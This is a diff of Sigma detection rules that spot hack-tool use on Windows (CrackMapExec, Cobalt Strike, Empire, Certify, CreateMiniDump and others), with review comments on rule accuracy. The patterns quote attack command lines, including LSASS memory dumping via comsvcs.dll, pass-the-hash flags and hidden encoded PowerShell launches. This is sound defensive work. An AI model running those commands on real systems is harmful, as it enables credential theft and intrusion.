b/sigma/builtin/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml 
@@ -1,8 +1,7 @@ title: Remote CHM File Download/Execution Via HH.EXE id: f57c58b3-ee69-4ef5-9041-455bf39aaa89 status: experimental -description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" - files. +description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_cli: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml index 8245266b8..657e221be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml @@ -34,7 +34,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \hh.exe - NewProcessName|endswith: + NewProcessName|endswith: - \CertReq.exe - \CertUtil.exe - \cmd.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml index 8c50f6a41..e34d34c84 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hh_susp_execution.yml 
@@ -33,16 +33,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: HH.exe - - NewProcessName|endswith: \hh.exe + - OriginalFileName: HH.exe + - NewProcessName|endswith: \hh.exe selection_paths: - CommandLine|contains: + CommandLine|contains: - .application - \AppData\Local\Temp\ - \Content.Outlook\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ + # - '\AppData\Local\Temp\Temp?_' + # - '\AppData\Local\Temp\Rar$' + # - '\AppData\Local\Temp\7z' + # - '\AppData\Local\Temp\wz' + # - '\AppData\Local\Temp\peazip-tmp' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml index 45b350af1..5dfad6521 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_adcspwn.yml @@ -1,9 +1,7 @@ title: HackTool - ADCSPwn Execution id: cd8c163e-a19b-402e-bdd5-419ff5859f12 status: test -description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges - in an active directory network by coercing authenticate from machine accounts - and relaying to the certificate service +description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service references: - https://github.com/bats3c/ADCSPwn author: Florian Roth (Nextron Systems) @@ -20,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' --adcs ' - ' --port ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml index 24d07f307..ca22a2952 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml @@ -1,8 +1,7 @@ title: HackTool - Bloodhound/Sharphound Execution id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962 status: test -description: Detects command line parameters used by Bloodhound and Sharphound hack - tools +description: Detects command line parameters used by Bloodhound and Sharphound hack tools references: - https://github.com/BloodHoundAD/BloodHound - https://github.com/BloodHoundAD/SharpHound @@ -26,16 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - Product|contains: SharpHound - - Description|contains: SharpHound - - Company|contains: - - SpecterOps - - evil corp - - NewProcessName|contains: - - \Bloodhound.exe - - \SharpHound.exe + - Product|contains: SharpHound + - Description|contains: SharpHound + - Company|contains: + - SpecterOps + - evil corp + - NewProcessName|contains: + - \Bloodhound.exe + - \SharpHound.exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' -CollectionMethod All ' - ' --CollectionMethods Session ' - ' --Loop --Loopduration ' @@ -44,11 +43,11 @@ detection: - Invoke-Bloodhound - Get-BloodHoundData selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' -JsonFolder ' - ' -ZipFileName ' selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - ' DCOnly ' - ' --NoSaveCache ' condition: process_creation and (1 of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml index a27886f94..1fca01cfd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml 
@@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - .dll - StartNodeRelay diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml index 0771825f9..efd2830eb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_certify.yml @@ -1,8 +1,7 @@ title: HackTool - Certify Execution id: 762f2482-ff21-4970-8939-0aa317a886bb status: experimental -description: Detects Certify a tool for Active Directory certificate abuse based on - PE metadata characteristics and common command line arguments. +description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/GhostPack/Certify author: pH-T (Nextron Systems) @@ -20,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Certify.exe - - OriginalFileName: Certify.exe - - Description|contains: Certify + - NewProcessName|endswith: \Certify.exe + - OriginalFileName: Certify.exe + - Description|contains: Certify selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - '.exe cas ' - '.exe find ' - '.exe pkiobjects ' - '.exe request ' - '.exe download ' selection_cli_options: - CommandLine|contains: + CommandLine|contains: - ' /vulnerable' - ' /template:' - ' /altname:' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml index 3f3e43f20..14da6eccc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_certipy.yml 
@@ -1,8 +1,7 @@ title: HackTool - Certipy Execution id: 6938366d-8954-4ddc-baff-c830b3ba8fcd status: experimental -description: Detects Certipy a tool for Active Directory Certificate Services enumeration - and abuse based on PE metadata characteristics and common command line arguments. +description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. references: - https://github.com/ly4k/Certipy author: pH-T (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Certipy.exe - - OriginalFileName: Certipy.exe - - Description|contains: Certipy + - NewProcessName|endswith: \Certipy.exe + - OriginalFileName: Certipy.exe + - Description|contains: Certipy selection_cli_commands: - CommandLine|contains: + CommandLine|contains: - ' auth ' - ' find ' - ' forge ' @@ -31,7 +30,7 @@ detection: - ' req ' - ' shadow ' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -bloodhound' - ' -ca-pfx ' - ' -dc-ip ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml index 6dbbfc159..293606537 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml 
@@ -1,11 +1,10 @@ title: Operator Bloopers Cobalt Strike Commands id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 related: - - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 - type: similar + - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 + type: similar status: test -description: Detects use of Cobalt Strike commands accidentally entered in the CMD - shell +description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell references: - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/ @@ -25,14 +24,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|startswith: + CommandLine|startswith: - 'cmd ' - cmd.exe - c:\windows\system32\cmd.exe - CommandLine|contains: + CommandLine|contains: - psinject - spawnas - make_token diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml index cd645ac24..e31d4d7e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml @@ -1,8 +1,8 @@ title: Operator Bloopers Cobalt Strike Modules id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 related: - - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 - type: similar + - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 + type: similar status: test description: Detects Cobalt Strike module/commands accidentally entered in CMD shell references: 
@@ -23,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-UserHunter - Invoke-ShareFinder - Invoke-Kerberoast diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml index 431e71917..46cf1054f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml @@ -1,8 +1,7 @@ title: CobaltStrike Load by Rundll32 id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 status: test -description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs - from the command line. +description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable - https://redcanary.com/threat-detection-report/ @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_rundll: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: - - rundll32.exe - - 'rundll32 ' + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: + - rundll32.exe + - 'rundll32 ' selection_params: - CommandLine|contains: .dll - CommandLine|endswith: + CommandLine|contains: .dll + CommandLine|endswith: - ' StartW' - ',StartW' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml index e401321a4..9898702a4 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_generic_1: - CommandLine|endswith: cmd.exe /C whoami + CommandLine|endswith: cmd.exe /C whoami ParentProcessName|startswith: C:\Temp\ selection_generic_2: - CommandLine|contains|all: + CommandLine|contains|all: - cmd.exe /c echo - '> \\\\.\\pipe' ParentProcessName|endswith: @@ -32,10 +32,10 @@ detection: ParentCommandLine|contains|all: - cmd.exe /C echo - ' > \\\\.\\pipe' - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 selection_conhost_2: ParentCommandLine|endswith: /C whoami - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml index 95a0f52de..cb7f0751e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_coercedpotato.yml 
@@ -19,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_loader_img: - NewProcessName|endswith: \CoercedPotato.exe + NewProcessName|endswith: \CoercedPotato.exe selection_params: - CommandLine|contains: ' --exploitId ' + CommandLine|contains: ' --exploitId ' selection_loader_imphash: - - Imphash: - - a75d7669db6b2e107a44c4057ff7f7d6 - - f91624350e2c678c5dcbe5e1f24e22c9 - - 14c81850a079a87e83d50ca41c709a15 - - Hashes: - - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 - - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 - - IMPHASH=14C81850A079A87E83D50CA41C709A15 + - Imphash: + - a75d7669db6b2e107a44c4057ff7f7d6 + - f91624350e2c678c5dcbe5e1f24e22c9 + - 14c81850a079a87e83d50ca41c709a15 + - Hashes: + - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 + - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 + - IMPHASH=14C81850A079A87E83D50CA41C709A15 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml index a44964feb..80992abef 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_covenant.yml @@ -20,16 +20,16 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -Sta - -Nop - -Window - Hidden - CommandLine|contains: + CommandLine|contains: - -Command - -EncodedCommand selection_2: - CommandLine|contains: + CommandLine|contains: - 'sv o (New-Object IO.MemorySteam);sv d ' - mshta file.hta - GruntHTTP diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml index d337255de..adf01b61f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Execution id: 42a993dd-bb3e-48c8-b372-4d6684c4106c status: test -description: This rule detect common flag combinations used by CrackMapExec in order - to detect its use even if the binary has been replaced. +description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local - https://www.mandiant.com/resources/telegram-malware-iranian-espionage @@ -31,47 +30,47 @@ detection: EventID: 4688 Channel: Security selection_binary: - NewProcessName|endswith: \crackmapexec.exe + NewProcessName|endswith: \crackmapexec.exe selection_special: - CommandLine|contains: ' -M pe_inject ' + CommandLine|contains: ' -M pe_inject ' selection_execute: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -x ' selection_hash: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' - - ' -H ''NTHASH''' + - " -H 'NTHASH'" selection_module_mssql: - CommandLine|contains|all: + CommandLine|contains|all: - ' mssql ' - ' -u ' - ' -p ' - ' -M ' - ' -d ' selection_module_smb1: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -H ' - ' -M ' - ' -o ' selection_module_smb2: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -p ' - ' --local-auth' part_localauth_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' part_localauth_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' 10.' - ' 192.168.' - '/24 ' 
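Review bot: The `selection_hash` entry `" -H 'NTHASH'"` only matches a command line that literally contains the documentation placeholder `'NTHASH'`; a real pass-the-hash run passes an actual hash value after `-H`, so this selection will essentially never fire outside a copy-pasted example, and the requoting in this hunk carries that over unchanged. If the intent is local-auth pass-the-hash, `- ' -H '` is the usable form, and `- ' -p '` in the same `contains|all` list should probably go, since a password and a hash are not normally given together — confirm against the CME argument parser before dropping it. `selection_module_smb1` already shows the `' -H '` style, so the change keeps the rule consistent. The rule's `condition:` lies outside this hunk, so I could not check how `selection_hash` is combined with the other selections.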
diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml index d90aee7ba..01df33b8b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml @@ -22,11 +22,16 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless) - cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:109 (fileless output via share) - cmd.exe /C * > \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:111 (fileless output via share) - cmd.exe /C * > *\\Temp\\* 2>&1 + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation) - powershell.exe -exec bypass -noni -nop -w 1 -C " + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation) - 'powershell.exe -noni -nop -w 1 -enc ' condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml index ce6ac21f4..4418f7334 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml 
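Review bot: The source-reference comments added above the `selection` entries are inconsistent: the two PowerShell lines cite a pinned commit URL (`d8c50c8…/cme/helpers/powershell.py#L136`), while the atexec entries cite bare `atexec.py:109` / `:111` line numbers and the wmiexec entry gives no location at all; bare line numbers rot as soon as the upstream file changes. I'd use the pinned form for all five, e.g. `# https://github.com/byt3bl33d3r/CrackMapExec/blob/<commit>/cme/protocols/smb/atexec.py#L109 (fileless output via share)`, filling in the commit the pattern was actually verified against. While here, `cmd.exe /C * > *\\Temp\\* 2>&1` is wide enough to catch admin scripts that redirect into a Temp folder, which is worth naming under `falsepositives:` (its entries are outside this hunk).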
@@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Process Patterns id: f26307d8-14cd-47e3-a26b-4b4769f24af6 status: test -description: Detects suspicious process patterns found in logs when CrackMapExec is - used +description: Detects suspicious process patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) @@ -19,27 +18,27 @@ detection: EventID: 4688 Channel: Security selection_lsass_dump1: - CommandLine|contains|all: + CommandLine|contains|all: - 'tasklist /fi ' - Imagename eq lsass.exe - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd.exe /r ' - 'cmd.exe /k ' - 'cmd /c ' - 'cmd /r ' - 'cmd /k ' - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_lsass_dump2: - CommandLine|contains|all: + CommandLine|contains|all: - do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump - \Windows\Temp\ - ' full' - '%%B' selection_procdump: - CommandLine|contains|all: + CommandLine|contains|all: - tasklist /v /fo csv - findstr /i "lsass" condition: process_creation and (1 of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml index 484642bca..2691d0a64 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml 
@@ -1,8 +1,7 @@ title: HackTool - CrackMapExec PowerShell Obfuscation id: 6f8b3439-a203-45dc-a88b-abf57ea15ccf status: test -description: The CrachMapExec pentesting framework implements a PowerShell obfuscation - with some static strings detected by this rule. +description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. references: - https://github.com/byt3bl33d3r/CrackMapExec - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 @@ -22,20 +21,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - join*split + # Line 343ff - ( $ShellId[1]+$ShellId[13]+'x') - ( $PSHome[*]+$PSHOME[*]+ - ( $env:Public[13]+$env:Public[5]+'x') - ( $env:ComSpec[4,*,25]-Join'') - - '[1,3]+''x''-Join'''')' + - "[1,3]+'x'-Join'')" condition: process_creation and (all of selection_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml index 4abcef809..406d1cc93 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_createminidump.yml 
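Review bot: The added `# Line 343ff` comment in `selection_cli` does not say which file or revision it refers to; the rule's `references` pin `cme/helpers/powershell.py` at commit `0a49f75…#L242`, so a reader cannot tell whether 343ff is the same file at a newer commit or a different helper. Write it as a pinned URL like the reference entry, e.g. `# https://github.com/byt3bl33d3r/CrackMapExec/blob/<commit>/cme/helpers/powershell.py#L343`, with the commit the line numbers were read from. The requoted last entry `"[1,3]+'x'-Join'')"` decodes to the same string as the old `'[1,3]+''x''-Join'''')'`, so there is no behaviour change to worry about there.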
@@ -1,8 +1,7 @@ title: HackTool - CreateMiniDump Execution id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d status: test -description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process - memory for credential extraction on the attacker's machine +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass author: Florian Roth (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \CreateMiniDump.exe - - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f - - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f + - NewProcessName|endswith: \CreateMiniDump.exe + - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f + - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml index e0d910014..70157e709 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_dinjector.yml @@ -1,10 +1,9 @@ title: HackTool - DInjector PowerShell Cradle Execution id: d78b5d61-187d-44b6-bf02-93486a80de5a status: test -description: Detects the use of the Dinject PowerShell cradle based on the specific - flags +description: Detects the use of the Dinject PowerShell cradle based on the specific flags references: - - https://github.com/snovvcrash/DInjector + - https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2023/02/04 
@@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /am51' - ' /password' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml index 182c46afa..738764318 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_edrsilencer.yml @@ -1,11 +1,8 @@ title: HackTool - EDRSilencer Execution id: eb2d07d4-49cb-4523-801a-da002df36602 status: experimental -description: 'Detects the execution of EDRSilencer, a tool that leverages Windows - Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents - from reporting security events to the server based on PE metadata information. - - ' +description: | + Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. references: - https://github.com/netero1010/EDRSilencer author: '@gott_cyber' @@ -21,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \EDRSilencer.exe - - OriginalFileName: EDRSilencer.exe - - Description|contains: EDRSilencer + - NewProcessName|endswith: \EDRSilencer.exe + - OriginalFileName: EDRSilencer.exe + - Description|contains: EDRSilencer condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml index 666fa756f..1f46f4124 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -sta -NonI -W Hidden -Enc ' - ' -noP -sta -w 1 -enc ' - ' -NoP -NonI -W Hidden -enc ' diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml index b76326e4d..ae996cd74 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)' - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml index 2a47f49b3..c43257a83 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_evil_winrm.yml 
@@ -1,9 +1,7 @@ title: HackTool - WinRM Access Via Evil-WinRM id: a197e378-d31b-41c0-9635-cfdf1c1bb423 status: test -description: Adversaries may use Valid Accounts to log into a computer using the Remote - Desktop Protocol (RDP). The adversary may then perform actions as the logged-on - user. +description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm - https://github.com/Hackplayers/evil-winrm @@ -21,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection_mstsc: - CommandLine|contains|all: + CommandLine|contains|all: - '-i ' - '-u ' - '-p ' - NewProcessName|endswith: \ruby.exe + NewProcessName|endswith: \ruby.exe condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml b/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml index 126d82faa..150f6f6be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - Imphash id: 